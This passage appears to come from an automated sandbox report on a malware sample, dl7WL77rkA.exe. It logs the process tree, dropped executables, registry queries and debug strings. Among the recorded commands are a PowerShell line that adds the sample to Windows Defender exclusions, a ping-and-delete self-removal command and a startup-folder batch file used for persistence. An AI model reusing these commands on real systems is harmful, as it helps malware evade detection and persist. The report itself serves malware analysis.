                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
                  Source: dl7WL77rkA.exeReversingLabs: Detection: 62%
                  Source: unknownProcess created: C:\Users\user\Desktop\dl7WL77rkA.exe C:\Users\user\Desktop\dl7WL77rkA.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Users\user\AppData\Local\Temp\wfplwfs.exe C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\wfplwfs.exe C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hentaitoonami.com/
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Users\user\AppData\Local\Temp\wfplwfs.exe C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Google Drive.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeWindow found: window name: TButton
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: dl7WL77rkA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: dl7WL77rkA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: dl7WL77rkA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: Loader.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb7 source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp
                  Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 